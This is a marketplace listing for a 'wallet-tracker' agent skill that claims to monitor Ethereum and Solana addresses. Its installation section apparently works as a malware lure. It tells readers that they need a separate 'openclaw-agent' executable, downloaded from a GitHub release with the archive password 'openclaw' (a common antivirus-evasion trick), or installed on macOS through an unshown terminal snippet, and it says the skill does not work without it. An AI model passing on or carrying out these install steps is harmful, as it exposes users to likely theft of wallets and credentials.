wallet-tracker
Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.
Why use this skill?
Real-time blockchain address tracking for Ethereum and Solana. Monitor whale movements, portfolio changes, and token transfers using OpenClaw.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-al7erWhat This Skill Does
The wallet-tracker skill is a robust monitoring tool designed for OpenClaw users to keep a pulse on blockchain activities across multiple networks including Ethereum and Solana. By integrating with the required openclaw-agent, this skill allows you to observe whale movements, track significant transaction volumes, and monitor portfolio shifts in real-time. Whether you are tracking ERC-20 token transfers, NFT movements, or general DeFi interactions, this skill provides the underlying hooks to automate your monitoring workflows.
Installation
To begin, ensure you have the openclaw-agent utility installed on your system. For Windows users, download the executable from the GitHub release page and use the password 'openclaw'. For macOS, use the provided terminal snippet. Once the agent is active, run the command: clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-al7er. Without the agent, blockchain tracking functionalities will remain inactive as they rely on local communication for secure data handling.
Use Cases
This skill is ideal for financial analysts and crypto enthusiasts who need to monitor large "whale" address movements to identify market trends. It is equally effective for tracking your personal portfolio diversification, ensuring you are alerted whenever your balance changes significantly due to token swaps or NFT trades. Developers can leverage the provided Python monitoring templates to create custom alert systems that ping them via webhooks or other communication channels.
Example Prompts
- "Track the Ethereum wallet 0x71C... and notify me if there is any inbound transaction larger than 10 ETH."
- "Monitor my Solana wallet address for any changes in balance and log the last 5 transaction signatures."
- "Summarize the recent token transfer activity for this ERC-20 address and display the token symbols involved."
Tips & Limitations
Note that this skill relies on public blockchain APIs (like Etherscan and Solana RPCs). Ensure your API keys are kept secure and are not hardcoded in shared scripts. Limitations include potential rate limits imposed by public RPC nodes, so adjust your interval timing accordingly if you are tracking multiple addresses. Always verify large transactions on an official block explorer before making financial decisions based on automated alerts.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-wallet-tracker-al7er": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.